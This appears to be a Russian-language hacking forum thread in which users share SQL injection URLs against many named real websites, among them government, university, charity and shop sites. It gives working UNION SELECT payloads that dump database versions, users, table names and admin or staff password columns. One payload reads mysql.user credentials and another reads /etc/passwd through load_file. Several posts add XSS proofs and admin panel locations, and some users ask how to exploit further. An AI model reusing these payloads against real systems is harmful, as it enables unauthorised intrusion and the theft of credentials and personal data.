SQL Инъекции

p_blog@localhost:4.1.21_blog

 

User: [email protected]
Version:5.0.27-standard-log
Dbname:marianweb

мини хостинг. юзер - рут.версия -5.

 

Code:

http://www.romanempiretours.com/stour.php?id=11+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+--+

MySql 5.1

 

ТИЦ = 10

5.0.22-Debian_0ubuntu6.06.12-log

Code:

http://www.ibis.dk/stoet/index.php?mode=readmenu&menuId=-23+union+select+1,group_concat%28column_name%29,3,4,5,6+from+information_schema.columns+   where+table_name=char%28107,105,100,95,115,116,97,102,102%29%20--

Из таблицы kid_staff

staff_id
username
password
usertype
firstname
middlename
lastname
gender
country
country_es
region
nationality
nationality_es
birthdate
lastmod
webstatus
rank
status

 

Code:

http://jobmillion.com/en/member/detail-job.php?action=showlist&ID=-10+union+select+1,2,3,4,5,6,7,8,group_concat%28million_system_staff_Password%29,group_concat%28million_system_staff_UserName%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+million_system_staff%20--

Из таблицы million_system_staff

В Ы В О Д И Т С Я

million_system_staff_ID
million_system_staff_Name
million_system_staff_Email
million_system_staff_UserName
million_system_staff_Password
million_system_staff_CreateByID
million_system_staff_CreateBy
million_system_staff_CreateDate
million_system_staff_LastLoginDate
million_system_staff_Status
million_system_staff_Level

А Д М И Н К А

http://jobmillion.com/stats

Code:

http://www.infowomen.org/portfolio/clc/web_app/admin/job.php?job_id=-1+union+select+group_concat%28column_name%29+from+information_schema.columns+where+table_name=char%28116,98,108,95,112,101,114,115,111,110,115%29%20--

Из таблицы tbl_persons

В Ы В О Д И Т С Я

person_id
first_name
last_name
client_id
job_id
email_address
password
y_n_recipient

А Д М И Н К А

http://www.infowomen.org/admin


ТИЦ = 10

5.1.26-rc

AVTOTYRE@localhost

Code:

http://www.avto-tyre.ru/shop.php?id=-27+union+select+1,2,group_concat%28column_name%29,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=char%2897,100,100,114,101,115,115%29%20--

Из таблицы address

address_id
user_id
name
index
region
city
street
telephon
info
address_id
user_id
index
region
district
city
name
telephon
fax
street
house
building
stroenie
flat
entrance
floor
code
info

 

Code:

http://www.brain-tumor.org/?id=-11+union+select+1,concat%28user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

 

http://www.accessoriescoop.com/products.php?cid=49/**/and/**/1=2/**/union/**/select/**/1,version(),3,4/*

4.1.22-standard

Не смог подобрать названия таблиц, стыдно конечно (. Как можно заюзать такие скули? Help somebody

 

http://www.naregatsi.org/new/arm/events/up_events_details.php?event_id=1+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28

version() 5.1.45-log
user() naregats_tigran@localhost
database() naregats_naregatsi

+ XSS

http://www.naregatsi.org/new/arm/events/up_events_details.php?event_id=1+and+1=0+union+select+1,2,3,4,5,<img src=http://forum.antichat.ru/antichat/pic/logo.gif width=500 hegth=800></img>,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28

 

http://surediamond.com/product.php?disproid=53+union+select+1,2,version(),4,5--
можно ли както раскрутить дальше ? подскажите в пм , спс.

 

Code:

http://www.che-esche.com/fullafisha.php?id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15

Code:

http://thedivinemercy.org/news/department.php?PLID=-72+union+select+1,user(),version(),4,5/*

Code:

http://www.ktcomputer.de/start.php?kat=news&kat_id=-1+union+select+1,2,3,4,5,6,7,8,version(),user(),11,12,13,14,15,16,17--

Первые SQL-ы, практикуюсь

 

http://www.revues-plurielles.org/php/index.php?nav=revue&no=17+union+select+1,2,3,4,5

OS -Windows NT

user() revues-plu-admin@localhost
version() 5.0.21-community-nt
database() revues-plurielles

+ XSS

http://www.revues-plurielles.org/php/index.php?nav=revue&no="><script>alert('ANTICHAT')</script>

 

Code:

http://www.zeltarasa.com/?lang=ru&id=1+union+select+1,concat_ws(0x3a,user(),database(),version())+--

Code:

http://www.fotomundo.com/nota.php?id=-1+union+select+1,2,3,4,version(),user(),7,database(),9,10,11,12,13,14,15--

Code:

http://krasuis.ru/inset/foto.php?id=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4--

Code:

http://www.provisor.com.ua/news.php?art=-1+union+select+1,2,3,4,5,6,7,user(),version(),database()--

Code:

http://www.boxclever.ca/news.php?id=-1+union+select+version(),2,user(),database(),5+--+

Code:

http://www.ekomtech.kiev.ua/a-news/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9--

Code:

http://shepherdpost.christianpost.com/mainbox/news.php?cat=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9+--+

Здесь можно посмотреть таблицы:

Code:

http://shepherdpost.christianpost.com/mainbox/news.php?cat=-1+union+select+1,2,3,table_name,5,6,7,8,9+from+information_schema.tables+--

Code:

http://dev.ultimareplenisher.com/news.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version()),2--

Code:

http://www.kpbptpn.co.id/news.php?lang=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13--

Code:

http://views24hours.com/view24hours/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9--

Здесь вывод в самом низу, справа.

Code:

http://www.tagittins.co.uk/news.php?id=-1+union+select+1,user(),3,database(),5,6,7,8,9--

Code:

http://avto-tire.ru/item_view.php?id=&item_id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17+--+

Здесь 54 таблицы, последняя:

Code:

http://avto-tire.ru/item_view.php?id=&item_id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables+limit+54,1--+

Code:

http://www.ctaholidays.net/beta/holiday_details.php?id=-1+union+select+1,2,3,4,5,6,7,user(),9,10,11,12,13,14,database()--

 

User: scully@localhost
Version: 4.1.22-log
Dbname: scully

есть таблица мемберс

 

http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+select+1,2,3,concat(user,char(58),password),5,6+from+mysql.user--

OS - Debian GNU/Linux

user() : root@localhost

version() : 4.0.24_Debian-10sarge1-log

database() : ens_data


robots.txt:

User-agent: *
Disallow: /chbpascal/
Disallow: /college/video_college
Disallow: /college/photos
Disallow: /college/vignettes
Disallow: /college/en/video_college
Disallow: /college/en/photos
Disallow: /college/en/vignettes
Disallow: /en/audio
Disallow: /en/bonus
Disallow: /en/photos
Disallow: /en/video
Disallow: /en/video_stream
Disallow: /en/vignettes
Disallow: /pear
Disallow: /photos
Disallow: /administration
Disallow: /vignettes
Disallow: /college2
Disallow: /video
Disallow: /audio
Disallow: /video_stream
Disallow: /bonus

/etc/passwd

http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+select+1,2,3,load_file(CHAR(47,101,116,99,47,112,97,115,115,119,100)),5,6+from+mysql.user--



+XSS

http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+select+1,2,3,<img src=http://img525.imageshack.us/img525/7127/matrixic9.jpg></img>,5,6--

 

Здесь вывод в заголовке:

Code:

http://map64.ru/index.php?id=-1+union+select+user()--

Есть таблица users, она последняя:

Code:

http://map64.ru/index.php?id=-1+union+select+table_name+from+information_schema.tables+limit+23,1--

Админка:

Code:

http://www.map64.ru/job

 

dudu,edu

version:4
----------------------------------

вывод в тайтле

 

и оно же

User: dynamicdb@localhost
Version: 5.0.27
Dbname: dynamic

 

Code:

http://www.conacyt.gov.py/admin/mostrar.php?noti=imagen&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())--

Username: web@localhost
Database: web
Version: 5.0.26

Code:

http://www.wyoptv.org/programming/viewprogram.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,version(),database()/*

Username: wyoptv@localhost
Database: wyoptv
Version: 5.0.32-Debian_7etch6-log

Code:

http://www.2how.com/board/index.php?group=-1+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12,13--

Username: root@localhost
Database: howhow_board
Version: 5.0.67-log

Code:

http://www.china-efe.org/article/article_show.php?article_id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16--

Username: chinaedu@localhost
Database: chinaefe
Version: 5.1.11-beta-log

 

Code:

http://lf-j.com/regi.php?id=-19+union+select+1,2,version%28%29,4,5,6,7,8,9+--+

Version: 5.0.89-community-log
User: lfjcom_user@localhost
Database: lfjcom_db

Code:

http://www.pitatel.com/pclass.php?id=-19+union+select+1,2,3,4,5,concat%28user%28%29,database%28%29,version%28%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+

Version: 4.0.22-standard 5
User: root@localhost
Database: mysql 5

 

ШкОлОтЭ ищет sql инъекции

PHP:

Target: http://www.turmanidze.ge/en/main.php?id=1223989248

Host IP: 212.72.131.186
Web Server: Apache/2.2.14 (FreeBSD) DAV/2
DB Server: MySQL >=5
Current User: turmanidze@localhost
Sql Version: 5.0.77
Current DB: turmanidze
System User: turmanidze@localhost
Host Name: webserver.sanet.ge
Installation dir: /usr/local/
DB User: 'turmanidze'@'localhost'
Data Bases: information_schema
test
turmanidze



http://www.turmanidze.ge/admin/
http://www.turmanidze.ge/phpmyadmin/

в userlist смотрите пасс и логин, правда у меня что-то не подходит